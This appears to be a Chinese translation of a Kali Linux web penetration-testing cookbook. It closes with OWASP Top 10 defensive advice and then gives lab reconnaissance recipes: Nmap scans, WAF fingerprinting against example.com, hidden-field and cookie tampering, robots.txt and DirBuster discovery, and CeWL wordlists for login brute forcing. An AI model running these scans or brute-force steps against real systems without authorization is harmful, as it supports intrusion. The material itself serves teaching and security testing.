327 | 1.  如果你使用的敏感数据可以在使用之后删除，那么删除它。最好每次使用信用卡的时候询问用户，避免被盗取。
328 | 
329 | 2.  在处理支付的时候，始终使用支付网关，而不是在你的服务器中储存数据。查看：` http://ecommerce-platforms.com/ ecommerce-selling-advice/choose-payment-gateway-ecommerce-store`。
330 | 
331 | 3.  如果我们需要储存敏感数据，我们要采取的第一个保护就是使用强密码算法和相应的强密钥来加密。推荐 Twofish、AES、RSA 和三重 DES。
332 | 
333 | 4.  密码储存在数据库的时候，应该以单项哈希函数的哈希形式存储，例如，bcypt、scrypt 或 SHA-2。
334 | 
335 | 5.  确保所有敏感文档只能被授权用户访问。不要在 Web 服务器的文档根目录储存它们，而是在外部目录储存，并通过程序来访问。如果出于某种原因必须在服务器的文档根目录储存敏感文件，使用`.htaccess `文件来防止直接访问：
336 | 
337 |     ```
338 |     Order deny,allow 
339 |     Deny from all
340 |     ```
341 |     
342 | 6.  禁用包含敏感数据的页面缓存。例如，在 Apache 中我们可以禁用 PDF 和 PNG 的缓存，通过`httpd.conf`中的下列设置：
343 | 
344 |     ```
345 |     <FilesMatch "\.(pdf|png)> 
346 |     FileETag None 
347 |     Header unset ETag 
348 |     Header set Cache-Control "max-age=0, no-cache, no-store, mustrevalidate" 
349 |     Header set Pragma "no-cache" 
350 |     Header set Expires "Wed, 11 Jan 1984 05:00:00 GMT" 
351 |     </FilesMatch>
352 |     ```
353 |     
354 | 7.  如果你允许文件上传，始终使用安全的通信频道来传输敏感数据，也就是带有 TLS 的 HTTPS，或者 FTPS（SSH 上的 FTP）。
355 | 
356 | ### 工作原理
357 | 
358 | 对于保护敏感数据，我们需要最小化数据泄露或交易的风险。这就是正确加密储存敏感数据，以及保护加密密钥是所做的第一件事情的原因。如果可能不需要储存这类数据，这只是个理想选择。
359 | 
360 | 密码应该使用单向哈希算法，在将它们储存到数据之前计算哈希。所以，即使它们被盗取，攻击者也不能立即使用它们，并且如果密码强度足够，哈希也是足够强的算法，它就不会在短时间内被破解。
361 | 
362 | 如果我们在 Apache 服务器的文档根目录（`/var/ www/html/`）储存敏感文档或数据，我们就通过 URL 将这些信息暴露用于下载。所以，最好将它储存到别的地方，并编写特殊的服务端代码来在必要时获取它们，并带有预先的授权检查。
363 | 
364 | 此外，例如 Archive.org、WayBackMachine 或者 Google 缓存页面，可能在缓存含有敏感信息的文件时，以及我们没能在应用的上一个版本有效保护它们时产生安全问题。所以，不允许缓存此类文档非常重要。
365 | 
366 | ## A7 确保功能级别的访问控制
367 | 
368 | 功能级别的访问控制是访问控制的一种，用于防止匿名者或未授权用户的功能调用。根据 OWASP，缺乏这种控制是 Web 应用中第七大严重的安全问题。
369 | 
370 | 这个秘籍中，我们会看到一些推荐来提升我们的应用在功能级别上的访问控制。
371 | 
372 | ### 操作步骤
373 | 
374 | 1.  确保每一步都正确检查了工作流的权限。
375 | 
376 | 2.  禁止所有默认访问，之后在显示的授权校验之后允许访问。
377 | 
378 | 3.  用户、角色和授权应该在灵活的媒介中储存，例如数据库或者配置文件，不要硬编码它们。
379 | 
380 | 4.  同样，“隐藏式安全”不是很好的策略。
381 | 
382 | ### 工作原理
383 | 
384 | 开发者只在工作流的开始检查授权，并假设下面的步骤都已经对用户授权，这是常见的现象。攻击者可能会尝试调用某个功能，它是工作流的中间步骤，并由于控制缺失而能够访问它。
385 | 
386 | 对于权限，默认禁止所有用户是个最佳实践。如果我们不知道一些用户是否有权访问一些功能，那么它们就不应该执行。将你的权限表转化为授权表。如果某些用户在某些功能上没有显式的授权，则禁止它们的访问。
387 | 
388 | 在为你的应用功能构建或实现访问控制机制的时候，将所有授权储存在数据库中，或者在配置文件中（数据库是最好的选项）。如果用户角色和权限被硬编码，它们就会难以维护、修改或更新。
389 | 
390 | ## A8 防止 CSRF
391 | 
392 | 当 Web 应用没有使用会话层面或者操作层面的标识，或者标识没有正确实现的时候，它们就可能存在跨站请求伪造漏洞，并且攻击者可以强迫授权用户执行非预期的操作。
393 | 
394 | CSRF 是当今 Web 应用的第八大严重漏洞，根据 OWASP， 并且我们在这个秘籍中会看到如何在应用中防止它。
395 | 
396 | ### 操作步骤
397 | 
398 | 1.  第一步也是最实际的 CSRF 解决方案就是实现唯一、操作层面的标识。所以每次用户尝试执行某个操作的时候，会生成新的标识并在服务端校验。
399 | 
400 | 2.  唯一标识应该不能被轻易由攻击者猜测，所以它们不能将其包含在 CSRF 页面中。随机生成是个好的选择。
401 | 
402 | 3.  在每个可能为 CSRF 目标的表单中包含要发送的标识。“添加到购物车”请求、密码修改表单、邮件、联系方式或收货信息管理，以及银行的转账页面都是很好的例子。
403 | 
404 | 4.  标识应该在每次请求中发送给服务器。这可以在 URL 中实现，或者任何其它变量或者隐藏字段，都是推荐的。
405 | 
406 | 5.  验证码的使用也可以防止 CSRF。
407 | 
408 | 6.  同样，在一些关键操作中询问重新授权也是个最佳实践，例如，银行应用中的转账操作。
409 | 
410 | ### 工作原理
411 | 
412 | 防止 CSRF 完全是确保验证过的用户是请求操作的人。由于浏览器和 Web 应用的工作方式，最佳实践是使用标识来验证操作，或者可能的情况下使用验证码来控制。
413 | 
414 | 由于攻击者打算尝试破解标识的生成，或者验证系统，以一种攻击者不能猜测的方式，安全地生成它们非常重要。而且要使它们对每个用户和每个操作都唯一，因为复用它们会偏离它们的目的。
415 | 
416 | 验证码控制和重新授权有时候会非常麻烦，使用户反感。但是如果操作的重要性值得这么做，用户可能愿意接受它们来换取额外的安全级别。
417 | 
418 | ### 另见
419 | 
420 | 有一些编程库有助于实现 CSRF 防护，节省开发者的大量工作。例子之一就是 OWASP 的 CSRF Guard：`https://www.owasp.org/index.php/CSRFGuard`。
421 | 
422 | ## A9 在哪里寻找三方组件的已知漏洞
423 | 
424 | 现在的 Wbe 应用不再是单个开发者，也不是单个开发团队的作品。开发功能性、用户友好、外观吸引人的 Web 应用涉及到三方组件的使用，例如编程库，外部服务的 API（Fackbook、Google、Twitter），开发框架，以及许多其它的组件，其中编程、测试和打补丁的工作量很少，甚至没有。
425 | 
426 | 有时候这些三方组件被发现存在漏洞，并且它们将这些漏洞转移到了我们的应用中。许多带有漏洞组件的应用很长时间都没有打补丁，使整个组织的安全体系中出现缺陷。这就是 OWASP 将使用带有已知漏洞的三方组件划分为 Web 应用安全的第九大威胁的原因。
427 | 
428 | 这个秘籍中，我们会了解，如果一些我们所使用的组件拥有已知漏洞，应该到哪里寻找，以及我们会查看一些这种漏洞组件的例子。
429 | 
430 | ### 操作步骤
431 | 
432 | 1.  第一个建议是，优先选择受支持和广泛使用的知名软件。
433 | 
434 | 2.  为你的应用所使用的三方组件保持安全更新和补丁的更新。
435 | 
436 | 3.  用于搜索一些特定组件的漏洞的好地方就是厂商的网站：它们通常拥有“发布说明”部分，其中它们会公布它们纠正了哪个 bug 或漏洞。这里我们可以寻找我们所使用的（或更新的）版本，并且插件是否有有已知的问题没有打补丁。
437 | 
438 | 4.  同样，厂商通常拥有安全建议站点，例如 Microsoft：`https://technet.microsoft.com/library/security/`，Joomla：` https:// developer.joomla.org/security-centre.html`，和Oracle：` http://www. oracle.com/technetwork/topics/security/alerts-086861.html`。我们可以使用它们来保持我们用于应用的软件的更新。
439 | 
440 | 5.  也有一些厂商无关的站点，它们致力于通知我们漏洞和安全问题。有个非常好的网站，集中了多个来源的信息，是 CVE Details（`http://www.cvedetails.com/`）。这里我们可以搜索多数厂商或产品，或者列出所有已知漏洞（至少是拥有 CVE 号码的漏洞），并且按照年份、版本和 CVSS 分数排列。
441 | 
442 | 6.  同时，黑客发布利用和发现的站点也是个获得漏洞和我们所使用的软件的信息的好地方。最流行的是 Exploit DB（`https://www.exploit-db.com/`）。 Full disclosure 邮件列表（`http://seclists.org/fulldisclosure/`），以及 Packet Storm 的文件部分（`https://packetstormsecurity.com/files/`）。
443 | 
444 | 7.  一旦我们发现了我们软件组件中的漏洞，我们必须评估它是否对我们的应用必要，或者需要移除。如果不能这样，我们需要尽快打补丁。如果没有可用的补丁或变通方案，并且漏洞是高危的，我们必须开始寻找组件的替代。
445 | 
446 | ### 工作原理
447 | 
448 | 考虑在我们的应用中使用三方软件组件之前，我们需要查看它的安全信息，并了解，我们所使用的组件是否有更稳定更安全的版本或替代。
449 | 
450 | 一旦我们选择了某个，并且将其包含到我们的应用中，我们需要使其保持更新。有时它可能涉及到版本改动以及没有后向兼容，但是这是我们想要维持安全的代价。如果我们不能更新或为高危漏洞打补丁，我们还可以使用 WAF（Web 应用防火墙）和IPS（入侵检测系统）来防止攻击。
451 | 
452 | 除了在执行渗透测试的时候比较实用，下载和漏洞发布站点可以被系统管理员利用，用于了解可能出现什么攻击，它们的原理，以及如何保护应用避免它们。
453 | 
454 | ## A10 重定向验证
455 | 
456 | 根据 OWASP，未验证的重定向和转发是 Web 应用的第十大严重安全问题。它发生在应用接受 URL 或内部页面作为参数来执行重定向或转发操作的时候。如果参数没有正确验证，攻击者就能够滥用它来使其重定向到恶意网站。
457 | 
458 | 这个秘籍中，我们会了解如何验证我们接受的用于重定向或转发的参数，我们需要在开发应用的时候实现它。
459 | 
460 | ### 操作步骤
461 | 
462 | 1.  不希望存在漏洞吗？那就不要使用它。无论怎样，都不要使用重定向和转发。
463 | 
464 | 2.  如果需要使用重定向，尝试不要使用用户提供的参数（请求变量）来计算出目标。
465 | 
466 | 3.  如果需要使用参数，实现一个表，将其作为重定向的目录，使用 ID 代替 URL 作为用户应该提供的参数。
467 | 
468 | 4.  始终验证重定向和转发操作涉及到的输入。使用正则表达式或者白名单来检查提供的值是否有效。
469 | 
470 | ### 工作原理
471 | 
472 | 重定向和转发是钓鱼者和其它社会工程师最喜欢用的工具，并且有时候我们对目标没有任何安全控制。所以，即使它不是我们的应用，它的安全问题也会影响我们的信誉。这就是最好不要使用它们的原因。
473 | 
474 | 如果这种重定向的目标是已知站点，例如 Fackbook 或 Google，我们就可以在配置文件或数据表中建立目标目录，并且不需要使用客户端提供的参数来实现。
475 | 
476 | 如果我们构建包含所有允许的重定向和转发 URL 的数据表，每个都带有 ID，我们可以将 ID 用于参数，而不是目标本身。这是一种白名单的形式，可以防止无效目标的插入。
477 | 
478 | 最后同样是校验。我们始终要校验每个来自客户端的输入，这非常重要，因为我们不知道用户要输入什么。如果我们校验了重定向目标的正确性，除了恶意转发或重定向之外，我们还可以防止可能的 SQL 注入、XSS或者目录遍历。所以，它们都是相关的。
479 | 


--------------------------------------------------------------------------------
/ch2.md:
--------------------------------------------------------------------------------
  1 | # 第二章 侦查
  2 | 
  3 | > 作者：Gilberto Najera-Gutierrez
  4 | 
  5 | > 译者：[飞龙](https://github.com/)
  6 | 
  7 | > 协议：[CC BY-NC-SA 4.0](http://creativecommons.org/licenses/by-nc-sa/4.0/)
  8 | 
  9 | ## 简介
 10 | 
 11 | 在每个渗透测试中，无论对于网络还是 Web 应用，都有一套流程。其中需要完成一些步骤，来增加我们发现和利用每个影响我们目标的可能的漏洞的机会。例如：
 12 | 
 13 | +   侦查
 14 | 
 15 | +   枚举
 16 | 
 17 | +   利用
 18 | 
 19 | +   维持访问
 20 | 
 21 | +   清理踪迹
 22 | 
 23 | 在 Web测试场景中，侦查是一个层面，其中测试者必须识别网络、防火墙和入侵检测系统中所有可能组件。它们也会收集关于公司、网络和雇员的最大信息。在我们的例子中，对于 Web 应用渗透测试，这个阶段主要关于了解应用、数据库、用户、服务器以及应用和我们之间的关系。
 24 | 
 25 | 侦查是每个渗透测试中的必要阶段。我们得到了的目标信息越多，发现和利用漏洞时，我们拥有的选项就越多。
 26 | 
 27 | ## 2.1 使用 Nmap 扫描和识别服务
 28 | 
 29 | Nmap 可能是世界上最广泛使用的端口扫描器。他可以用于识别活动主机、扫描 TCP 和 UDP 开放端口，检测防火墙，获得运行在远程主机上的服务版本，甚至是，可以使用脚本来发现和利用漏洞。
 30 | 
 31 | 这个秘籍中，我们会使用 Nmap 来识别运行在目标应用上的所有服务。出于教学目的，我们会多次调用 Nmap 来实现它，但是这可以通过单个命令来完成。
 32 | 
 33 | ### 准备
 34 | 
 35 | 我们只需要将 vulnerable_vm 运行起来。
 36 | 
 37 | ### 操作步骤
 38 | 
 39 | 1.  首先，我们打算看看服务器是否响应 ping，或者服务器是否打开：
 40 | 
 41 |     ```
 42 |     nmap -sn 192.168.56.102
 43 |     ```
 44 |     
 45 |     ![](img/2-1-1.jpg)
 46 |     
 47 | 2.  现在我们直到它打开了让我们看看打开了哪些端口：
 48 | 
 49 |     ```
 50 |     nmap 192.168.56.102
 51 |     ```
 52 |     
 53 |     ![](img/2-1-2.jpg)
 54 |     
 55 | 3.  现在，我们要让 Nmap 向服务器询问正在运行的服务的版本，并且基于它猜测操作系统。
 56 | 
 57 |     ```
 58 |     nmap -sV -O 192.168.56.10
 59 |     ```
 60 |     
 61 | 4.  我们可以看到，我们的 vulnerable_vm 使用 Linux 2.6 内核，并带有 Apache 2.2.14 Web 服务器，PHP 5.3.2，以及其它。
 62 | 
 63 | ### 工作原理
 64 | 
 65 | Nmap 是个端口扫描器，这意味着它可以向一些指定 IP 的 TCP 或 UDP 端口发送封包，并检查是否有响应。如果有的话，这意味着端口是打开的，因此，端口上运行着服务。
 66 | 
 67 | 在第一个名中，使用`-sn`参数，我们让 Nmap 只检查是否服务器响应 ICMP 请求（或 ping）。我们的服务器响应了，所以它是活动的。
 68 | 
 69 | 第二个命令是调用 Nmap 的最简方式，它只指定目标 IP。所做的事情是先 ping 服务器，如果它响应了，Nmap 会向 1000 个 TCP 端口列表发送探针，来观察哪个端口响应，之后报告响应端口的结果。
 70 | 
 71 | 第三个命令向第二个添加了如下两个任务：
 72 | 
 73 | +   `-sV`请求每个被发现的开放端口的标识（头部或者自我识别），这是它用作版本的东西。
 74 | 
 75 | +   `-O`告诉 Nmap，尝试猜测运行在目标上的操作系统。使用开放端口和版本收集的信息。
 76 | 
 77 | ### 更多
 78 | 
 79 | 有一些其它的实用参数：
 80 | 
 81 | +   `-sT`：通常，在 root 用户下运行 Nmap 时，它使用 SYN 扫描类型。使用这个参数，我们就强制让扫描器执行完全连接的扫描。它更慢，并且会在服务器的日志中留下记录，但是它不太可能被入侵检测系统检测到。
 82 | 
 83 | +   `-Pn`：如果我们已经知道了主机是活动的或者不响应 ping，我们可以使用这个参数告诉 Nmap 跳过 ping 测试，并扫描所有指定目标，假设它们是开启的。
 84 | 
 85 | +   `-v`：这会开启详细模式。Nmap 会展示更多关于它所做事情和得到回复的信息。参数可以在相同命令中重复多次：次数越多，就越详细（也就是说，`-vv`或`-v -v -v -v`）。
 86 | 
 87 | +   `-p N1,N2,Nn`：如果我们打算测试特定端口或一些非标准端口，我们可能想这个参数。`N1`到`Nn`是打算让 Nmap 扫描的端口。例如，要扫描端口 21，80 到 90，和 137，参数应为：` -p 21,80-90,137`。
 88 | 
 89 | +   ` --script=script_name`：Nmap 包含很多实用的漏洞检测、扫描和识别、登录测试、命令执行、用户枚举以及其它脚本。使用这个参数来告诉 Nmap 在目标的开放端口上运行脚本。你可能打算查看一些 Nmap 脚本，它们在：`https://nmap.org/nsedoc/scripts/`。
 90 | 
 91 | ### 另见
 92 | 
 93 | 虽然它最为流行，但是 Nmap 不是唯一可用的端口扫描器，并且，取决于不同的喜好，可能也不是最好的。下面是 Kali 中包含的一些其它的替代品：
 94 | 
 95 | + unicornscan 
 96 | + hping3 
 97 | + masscan 
 98 | + amap 
 99 | + Metasploit scanning module
100 | 
101 | ## 2.2 识别 Web 应用防火墙
102 | 
103 | Web 应用防火墙（WAF）是一个设备或软件，它可以检查发送到 Web 服务器的封包，以便识别和阻止可能的恶意封包，它们通常基于签名或正则表达式。
104 | 
105 | 如果未检测到的 WAF 阻止了我们的请求或者封禁了我们的 IP，我们渗透测试中就要处理很多的麻烦。在执行渗透测试的时候，侦查层面必须包含检测和是被 WAF，入侵检测系统（IDS），或者入侵阻止系统（IPS）。这是必须的，为了采取必要的手段来防止被阻拦或禁止。
106 | 
107 | 这个秘籍中，我们会使用不同的方法，并配合 Kali Linux 中的工具，阿里为检测和识别目标和我们之间的 Web 应用防火墙的存在。
108 | 
109 | ### 操作步骤
110 | 
111 | 1.  Nmap 包含了一些脚本，用于测试 WAF 的存在。让我们在 vulnerable-vm 上尝试它们：
112 | 
113 |     ```
114 |     nmap -p 80,443 --script=http-waf-detect 192.168.56.102
115 |     ```
116 |     
117 |     ![](img/2-2-1.jpg)
118 |     
119 |     好的，没检测到任何 WAF。所以这个服务器上没有 WAF。
120 |     
121 | 2.  现在，让我们在真正拥有防火墙的服务器上尝试相同命令。这里，我们会使用` example.com`，但是你可以在任何受保护的服务器上尝试它。
122 | 
123 |     ```
124 |     nmap -p 80,443 --script=http-waf-detect www.example.com
125 |     ```
126 |     
127 |     ![](img/2-2-2.jpg)
128 |     
129 |     Imperva 是 Web 应用防火墙市场的主流品牌之一。就像我们这里看到的，有一个保护网站的设备。
130 |     
131 | 3.  这里是另一个 Nmap 脚本，可以帮助我们识别所使用的设备，并更加精确。脚本在下面：
132 | 
133 |     ```
134 |     nmap -p 80,443 --script=http-waf-fingerprint www.example.com
135 |     ```
136 |     
137 |     ![](img/2-2-3.jpg)
138 |     
139 | 4.  另一个 Kali Linux 自带的工具可以帮助我们检测和是被 WAF，它叫做`waf00f`。假设` www.example.com`是受 WAF 保护的站点：
140 | 
141 |     ```
142 |     wafw00f www.example.com
143 |     ```
144 |     
145 |     ![](img/2-2-4.jpg)
146 |     
147 | ### 工作原理
148 | 
149 | WAF 检测的原理是通过发送特定请求到服务器，之后分析响应。例如，在` http-waf-detect`的例子中，它发送了一些基本的恶意封包，并对比响应，同时查找封包被阻拦、拒绝或检测到的标识。` http-waf-fingerprint`也一样，但是这个脚本也尝试拦截响应，并根据已知的不同 IDS 和 WAF 的模式对其分类。`wafw00f`也是这样。
150 | 
151 | ## 2.3 查看源代码
152 | 
153 | 查看网页的源代码允许我们理解一些程序的逻辑，检测明显的漏洞，以及在测试时有所参考，因为我们能够在测试之前和之后比较代码，并且使用比较结果来修改我们的下一次尝试。
154 | 
155 | 这个秘籍中，我们会查看应用的源代码，并从中得出一些结论。
156 | 
157 | ### 准备
158 | 
159 | 为这个秘籍启动 vulnerable_vm。
160 | 
161 | ### 操作步骤
162 | 
163 | 1.  浏览 <http://192.168.56.102>。
164 | 
165 | 2.  选择 WackoPicko 应用。
166 | 
167 | 3.  右击页面并选择`View Page Source`（查看源代码）。会打开带有页面源代码的新窗口：
168 | 
169 |     ![](img/2-3-1.jpg)
170 |     
171 |     根据源代码，我们可以发现页面所使用的库或外部文件，以及链接的去向。同时，在截图中可以看到，这个页面拥有一些隐藏的输入字段。选中的是` MAX_FILE_SIZE`，这意味着，当我们上传文件时，这个字段判断了文件允许上传的最大大小。所以，如果我们修改了这个值，我们可能就能够上传大于应用所预期的文件。这反映了一个重要的安全问题。
172 |     
173 | ### 工作原理
174 | 
175 | 网页的源代码在发现漏洞和分析应用对所提供输入的响应上非常有用。它也提供给我们关于应用内部如何工作，以及它是否使用了任何第三方库或框架的信息。
176 | 
177 | 一些应用也包含使用 JS 或任何其它脚本语言编写的输入校验、编码和加密函数。由于这些代码在浏览器中执行，我们能够通过查看页面源代码来分析它，一旦我们看到了校验函数，我们就可以研究它并找到任何能够让我们绕过它或修改结果的安全缺陷。
178 | 
179 | ## 4.4 使用 Firefox 分析和修改基本行为
180 | 
181 | Firebug 是个浏览器插件，允许我们分析网页的内部组件，例如表格元素、层叠样式表（CSS）类、框架以及其它。它也有展示 DOM 对象、错误代码和浏览器服务器之间的请求响应通信的功能。
182 | 
183 | 在上一个秘籍中，我们看到了如何查看网页的 HTML 源代码以及发现影藏的输入字段。隐藏的字段为文件最大大小设置了一些默认值。在这个秘籍中，我们会看到如何使用浏览器的调试扩展，这里是 Firefox 或者 OWASP-Mantra 上的 Firebug。
184 | 
185 | ### 准备
186 | 
187 | 启动 vulnerable_vm，访问 <http://192.168.56.102/WackoPicko>。
188 | 
189 | ### 操作步骤
190 | 
191 | 1.  右击`Check this file`（检查此文件），之后选择` Inspect Element with Firebug`（使用 Firebug 查看元素）。
192 | 
193 |     ![](img/2-4-1.jpg)
194 | 
195 | 2.  表单的第一个输入框存在`type="hidden" `参数，双击`hidden`。
196 | 
197 | 3.  将`hidden`改成`text`之后按下回车键。
198 | 
199 |     ![](img/2-4-2.jpg)
200 |     
201 | 4.  现在双击参数值的 30000。
202 | 
203 | 5.  将他改成 500000。
204 | 
205 |     ![](img/2-4-3.jpg)
206 |     
207 | 6.  现在，我们看到了页面上的新文本框，值为 500000。我们刚刚修改了文件大小上限，并添加了个表单字段来修改它。
208 | 
209 |     ![](img/2-4-4.jpg)
210 |     
211 | ### 工作原理
212 | 
213 | 一旦页面被浏览器收到，所有元素都可以修改，来改变浏览器解释它的方式。如果页面被重新加载，服务器所生成的版本会再次展示。
214 | 
215 | Firebug 允许我们修改几乎每个页面在浏览器中显示的层面。所以，如果存在建立在客户端的控制逻辑，我们可以使用工具来操作它。
216 | 
217 | ### 更多
218 | 
219 | Firebug 不仅仅是个取消输入框的隐藏或修改值的工具，它也拥有一些其它的实用功能：
220 | 
221 | +   `Console`标签页展示错误，警告以及一些在加载页面时生成的其它消息。
222 | 
223 | +   `HTML`标签页是我们刚刚使用的页面，它以层次方式展示 HTML，所以允许我们修改它的内容。
224 | 
225 | +   `CSS`标签页用于查看和修改页面使用的 CSS 风格。
226 | 
227 | +   `Script`让我们能够看到完整的 HTML 源代码，设置会打断页面加载的断点，执行到它们时会打断加载，以及检查脚本运行时的变量值。
228 | 
229 | +   `DOM`标签页向我们展示了DOM（文档对象模型）对象，它们的值，以及层次结构。
230 | 
231 | +   `Net`展示了发送给服务器的请求和它的响应，它们的类型、尺寸、响应时间，和时间轴上的顺序。
232 | 
233 | +   `Cookies`包含由服务器设置的 Cookie，以及它们的值和参数，就像它的名字那样。
234 | 
235 | ## 4.5 获取和修改 Cookie
236 | 
237 | Cookie 是由服务器发送给浏览器（客户端）的小型信息片段，用于在本地储存一些信息，它们和特定用户相关。在现代 Web 应用中，Cookie 用于储存用户特定的数据、例如主题颜色配置、对象排列偏好、上一个活动、以及（对我们更重要）会话标识符。
238 | 
239 | 这个秘籍中，我们会使用浏览器的工具来查看 Cookie 的值，它们如何储存以及如何修改它们。
240 | 
241 | ### 准备
242 | 
243 | 需要运行我们的 vulnerable_vm。`192.168.56.102`用于该机器的 IP 地址，我们会使用  OWASP-Mantra 作为 Web 浏览器。
244 | 
245 | ### 操作步骤
246 | 
247 | 1.  浏览 <http://192.168.56.102/WackoPicko>。
248 | 
249 | 2.  从 Mantra 的菜单栏访问`Tools | Application Auditing | Cookies Manager +`。
250 | 
251 |     ![](img/2-5-1.jpg)
252 |     
253 |     在这个截图中，我们可以从这个插件中看到所有该时刻储存的Cookie，以及所有它们所属的站点。我们也可以修改它们的值，删除它们以及添加新的条目。
254 |     
255 | 3.  从` 192.168.56.102 `选择`PHPSESSID`，之后点击`Edit`。
256 | 
257 | 4.  将`Http Only `的值修改为`Yes`。
258 | 
259 |     ![](img/2-5-2.jpg)
260 |     
261 |     我们刚刚修改的参数（`Http Only`）告诉浏览器，Cookie不能允许客户端脚本访问。
262 |     
263 | ### 工作原理
264 | 
265 | Cookies Manager+ 是个浏览器插件，允许我们查看、修改或删除现有的 Cookie，以及添加新的条目。因为一些应用依赖于储存在这些 COokie 中的值，攻击者可以使用它们来输入恶意的模式，可能会修改页面行为，或者提供伪造信息用于获取高阶权限。
266 | 
267 | 同时，在现代 Web 应用中，会话 Cookie 通常被使用，通常是登录完成之后的用户标识符的唯一兰苑。这会导致潜在的有效用户冒充，通过将 Cookie 值替换为某个活动会话的用户。
268 | 
269 | ## 2.6 利用 robots.txt
270 | 
271 | 要想进一步侦查，我们需要弄清楚是否站点有任何页面或目录没有链接给普通用户看。例如，内容管理系统或者内部网络的登录页面。寻找类似于它的站点会极大扩大我们的测试面，并给我们一些关于应用及其结构的重要线索。
272 | 
273 | 这个秘籍中，我们会使用`robots.txt`文件来发现一些文件和目录，它们可能不会链接到主应用的任何地方。
274 | 
275 | ### 操作步骤
276 | 
277 | 1.  浏览 <http://192.168.56.102/vicnum/>。
278 | 
279 | 2.  现在我们向 URL 添加`robots.txt`，之后我们会看到如下截图：
280 | 
281 |     ![](img/2-6-1.jpg)
282 |     
283 |     这个文件告诉搜索引擎，`jotto`和`cgi-bin`的首页不允许被任何搜索引擎（User Agent）收录。
284 |     
285 | 3.  让我们浏览 <http://192.168.56.102/vicnum/cgi-bin/>。
286 | 
287 |     ![](img/2-6-2.jpg)
288 |     
289 |     我们可以直接点击和访问目录中的任何 Perl 脚本。
290 |     
291 | 4.  让我们浏览 <http://192.168.56.102/vicnum/jotto/>。
292 | 
293 |     ![](img/2-6-3.jpg)
294 |     
295 | 5.  点击名称为`jotto`的文件，你会看到一些类似于下面的截图的东西：
296 | 
297 |     ![](img/2-6-4.jpg)
298 |     
299 |     Jooto 是个猜测五个字符的单词的游戏，这会不会是可能答案的列表呢？通过玩这个游戏来检验它，如果是的话，我们就已经黑掉了这个游戏。
300 |     
301 | ### 工作原理
302 | 
303 | `robots.txt`是 Web 服务器所使用的文件，用于告诉搜索引擎有关应该被索引，或者不允许查看的文件或目录的信息。在攻击者的视角上，这告诉了我们服务器上是否有目录能够访问但对公众隐藏。这叫做“以隐蔽求安全”（也就是说假设用户不会发现一些东西的存在，如果它们不被告知的话）。
304 | 
305 | ## 2.7 使用 DirBuster 发现文件和文件夹
306 | 
307 | DirBuster 是个工具，用于通过爆破来发现 Web 服务器中的现存文件和目录。我们会在这个秘籍中使用它来搜索文件和目录的特定列表。
308 | 
309 | ### 准备
310 | 
311 | 我们会使用一个文本文件，它包含我们要求 DirBuster 寻找的单词列表。创建文本文件`dictionary.txt`，包含下列东西：
312 | 
313 | + info 
314 | + server-status 
315 | + server-info 
316 | + cgi-bin 
317 | + robots.txt 
318 | + phpmyadmin 
319 | + admin 
320 | + login
321 | 
322 | ### 操作步骤
323 | 
324 | 1.  访问`Applications | Kali Linux | Web Applications | Web Crawlers | dirbuster`。
325 | 
326 |     ![](img/2-7-1.jpg)
327 |     
328 | 2.  在 DIrBuster 的窗口中，将目标 URL 设置为 <http://192.168.56.102/>。
329 | 
330 | 3.  将线程数设置为 20。
331 | 
332 | 4.  选择` List based brute force `（基于爆破的列表）并点击`Browse`（浏览）。
333 | 
334 | 5.  在浏览窗口中，选择我们刚刚创建的文件（`dictionary.txt`）。
335 | 
336 | 6.  取消选择`Be Recursive`（递归）。
337 | 
338 | 7.  对于这个秘籍，我们会让其它选项保持默认。
339 | 
340 | 8.  点击`Start`（开始）。
341 | 
342 |     ![](img/2-7-2.jpg)
343 |     
344 | 9.  如果我们查看`Resuults`（结果）标签页，我们会看到，DirBuster 已经找到了至少两个目录中的文件：` cgi-bin `和`phpmyadmin`。响应代码 200 意味着文件或目录存在且能够读取。PhpMyAdmin 是基于 Web 的 MySQL 数据库管理器，找到这个名称的目录告诉我们服务器中存在 DBMS，并且可能包含关于应用及其用户的相关信息。
345 | 
346 |     ![](img/2-7-3.jpg)
347 |     
348 | ### 工作原理
349 | 
350 | DirBuster 是个爬虫和爆破器的组合，它允许页面上的所有连接，但是同时尝试可能文件的不同名称。这些名称可以保存在文件中，类似于我们所使用的那个，或者可以由 DirBuster 通过“纯粹暴力破解”选项，并为生成单词设置字符集和最小最大长度来自动生成。
351 | 
352 | 为了判断文件是否存在，DirBuster 使用服务器生成的响应代码。最常见的响应在下面列出：
353 | 
354 | +   `200 OK`：文件存在并能够读取。
355 | 
356 | +   `404 File not found`：文件不存在。
357 | 
358 | +   `301 Moved permanently`：这是到给定 URL 的重定向。
359 | 
360 | +   `401 Unauthorized`：需要权限来访问这个文件。
361 | 
362 | +   `403 Forbidden`：请求有效但是服务器拒绝响应。
363 | 
364 | ## 2.8 使用 Cewl 分析密码
365 | 
366 | 在每次渗透测试中，查查都必须包含分析层面，其中我们会分析应用、部门或过程的名称、以及其它被目标组织使用的单词。当需要设置人员相关的用户名或密码的时候，这会帮助我们判断可能常被使用的组合。
367 | 
368 | 这个秘籍中，我们会使用 CeWL 来获取应用所使用的单词列表。并保存它用于之后的登录页面暴力破解。
369 | 
370 | ### 操作步骤
371 | 
372 | 1.  首先，我们查看 CeWL 的帮助我文件，来获得能够做什么的更好想法。在终端中输入：
373 | 
374 |     ```
375 |     cewl --help
376 |     ```
377 |     
378 |     ![](img/2-8-1.jpg)
379 |     
380 | 2.  我们会使用 CeWL 来获得 vulnerable_ vm 中 WackoPicko 应用的单词。我们想要长度最小为 5 的单词，显示单词数量并将结果保存到`cewl_WackoPicko.txt`。
381 | 
382 |     ```
383 |     cewl -w cewl_WackoPicko.txt -c -m 5 http://192.168.56.102/ WackoPicko/
384 |     ```
385 |     
386 | 3.  现在，我们打开 CeWL 刚刚生成的文件，并查看“单词数量”偶对的列表。这个列表仍然需要一些过滤来去掉数量多但是不可能用于密码的单词，例如“Services”，“Content”或者“information”。
387 | 
388 | 4.  让我们删除一些单词来构成单词列表的首个版本。我们的单词列表在删除一些单词和数量之后，应该看起来类似下面这样：
389 | 
390 | + WackoPicko 
391 | + Users 
392 | + person
393 | + unauthorized
394 | + Login
395 | + Guestbook
396 | + Admin
397 | + access
398 | + password
399 | + Upload
400 | + agree
401 | + Member
402 | + posted
403 | + personal
404 | + responsible
405 | + account
406 | + illegal
407 | + applications
408 | + Membership
409 | + profile
410 | 
411 | ### 工作原理
412 | 
413 | CeWL 是个 Kali 中的工具，爬取网站并提取独立单词的列表。他它也可以提供每次单词的重复次数，保存结果到文件，使用页面的元数据，以及其它。
414 | 
415 | ### 另见
416 | 
